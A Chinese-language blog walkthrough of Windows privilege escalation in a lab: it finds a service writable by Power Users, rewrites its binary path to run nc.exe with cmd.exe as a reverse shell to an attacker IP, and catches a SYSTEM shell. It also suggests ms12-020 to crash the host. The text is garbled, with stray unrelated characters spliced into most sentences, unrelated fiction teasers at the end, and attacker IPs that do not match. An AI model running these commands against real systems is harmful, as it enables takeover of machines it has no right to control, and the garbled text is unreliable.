在Windows低權(quán)限下利用服務(wù)進(jìn)行提權(quán)

用到的工具:accesschk布隔,這個(gè)工具可以用來檢查用戶和用戶組對(duì)文件离陶,目錄,注冊(cè)表項(xiàng)衅檀,全局對(duì)象和系統(tǒng)服務(wù)的權(quán)限招刨,在實(shí)際配置權(quán)限過程中,如果權(quán)限設(shè)置不當(dāng)哀军,那么win服務(wù)就可能被用于提權(quán)计济。
下載鏈接:
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
具體介紹:http://blog.51cto.com/rangercyh/497497

第一次運(yùn)行會(huì)出現(xiàn)一個(gè)許可彈窗,可以執(zhí)行 accesschk.exe /accepteula 來避免彈窗

實(shí)驗(yàn)環(huán)境 :

靶機(jī): win2003 sp2 IP:192.168.133.130

攻擊機(jī): win7 IP:192.168.133.128

在靶機(jī)添加一個(gè)用戶test排苍,并加入到本地組power users組中
執(zhí)行命令:
accesschk.exe -uwcqv "Power Users" *

來顯示Power User組可以操作的服務(wù)名稱信息

-u :抑制錯(cuò)誤

-w:僅顯示具有寫訪問權(quán)限的對(duì)象

-c:顯示服務(wù)名稱沦寂,輸入* 用戶與顯示所有服務(wù)

-q:省略標(biāo)識(shí)

-v:冗長(zhǎng)(包括WINDOUWS VISTA完整性級(jí)別)

image.png

前面的RW表示有讀寫權(quán)限,其中服務(wù)名稱為“DcomLaunch”和“kdc”服務(wù)可以被simeon用戶操作
這里我選“DcomLaunch” 進(jìn)行測(cè)試
然后使用“sc qc DcomLaunch”命令查詢DcomLaunch的詳細(xì)信息


image.png

可以看到是以系統(tǒng)權(quán)限運(yùn)行的
然后我們?cè)诳聪率欠駟?dòng)了 net start | find "DCOM Server Process Launcher"

image.png

說明服務(wù)是啟動(dòng)的
然后在獲取這個(gè)服務(wù)名稱提供的服務(wù)
運(yùn)行 tasklist /svc 找到對(duì)應(yīng)服務(wù)


image.png

接下來就是修改服務(wù)并獲取系統(tǒng)權(quán)限
這里我們還要配置使用nc反彈shell到我的攻擊機(jī)上
我們把nc放到c:\windows\temp目錄下
使用sc對(duì)服務(wù)進(jìn)行修改

sc config DcomLaunch binpath= "C:\windows\temp\nc.exe" -nv 192.168.193.131 4433 -e "C:\WINDOWS\system32\cmd.exe"

*注意binpath=后面一定要有個(gè)空格


image.png

我們?cè)诓樵兿路?wù)


image.png

在執(zhí)行
image.png

obj:指定運(yùn)行服務(wù)將使用的帳戶名淘衙,或指定運(yùn)行驅(qū)動(dòng)程序?qū)⑹褂玫?Windows 驅(qū)動(dòng)程序?qū)ο竺亍DJ(rèn)設(shè)置為 LocalSystem。

password:指定一個(gè)密碼彤守。如果使用了非 LocalSystem 的帳戶毯侦,則此項(xiàng)是必需的。
最后使用 net start DcomLaunch 命令(也可以用ms12-020打藍(lán)屏)重啟這個(gè)服務(wù)


image.png

攻擊機(jī)上用nc進(jìn)行監(jiān)聽4433即可得到反彈的shell
nc -lvvp 4433

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末具垫,一起剝皮案震驚了整個(gè)濱河市侈离,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌筝蚕,老刑警劉巖卦碾,帶你破解...
    沈念sama閱讀 217,542評(píng)論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件铺坞,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡洲胖,警方通過查閱死者的電腦和手機(jī)济榨,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,822評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來绿映,“玉大人擒滑,你說我怎么就攤上這事〔嫦遥” “怎么了丐一?”我有些...
    開封第一講書人閱讀 163,912評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)淹冰。 經(jīng)常有香客問我钝诚,道長(zhǎng),這世上最難降的妖魔是什么榄棵? 我笑而不...
    開封第一講書人閱讀 58,449評(píng)論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮潘拱,結(jié)果婚禮上疹鳄,老公的妹妹穿的比我還像新娘。我一直安慰自己芦岂,他們只是感情好瘪弓,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,500評(píng)論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著禽最,像睡著了一般腺怯。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上川无,一...
    開封第一講書人閱讀 51,370評(píng)論 1 302
  • 那天呛占,我揣著相機(jī)與錄音,去河邊找鬼懦趋。 笑死晾虑,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的仅叫。 我是一名探鬼主播帜篇,決...
    沈念sama閱讀 40,193評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼诫咱!你這毒婦竟也來了笙隙?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,074評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤坎缭,失蹤者是張志新(化名)和其女友劉穎竟痰,沒想到半個(gè)月后签钩,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,505評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡凯亮,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,722評(píng)論 3 335
  • 正文 我和宋清朗相戀三年边臼,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片假消。...
    茶點(diǎn)故事閱讀 39,841評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡柠并,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出富拗,到底是詐尸還是另有隱情臼予,我是刑警寧澤,帶...
    沈念sama閱讀 35,569評(píng)論 5 345
  • 正文 年R本政府宣布啃沪,位于F島的核電站粘拾,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏创千。R本人自食惡果不足惜缰雇,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,168評(píng)論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望追驴。 院中可真熱鬧械哟,春花似錦、人聲如沸殿雪。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,783評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)丙曙。三九已至爸业,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間亏镰,已是汗流浹背扯旷。 一陣腳步聲響...
    開封第一講書人閱讀 32,918評(píng)論 1 269
  • 我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留索抓,地道東北人薄霜。 一個(gè)月前我還...
    沈念sama閱讀 47,962評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像纸兔,于是被迫代替她去往敵國(guó)和親惰瓜。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,781評(píng)論 2 354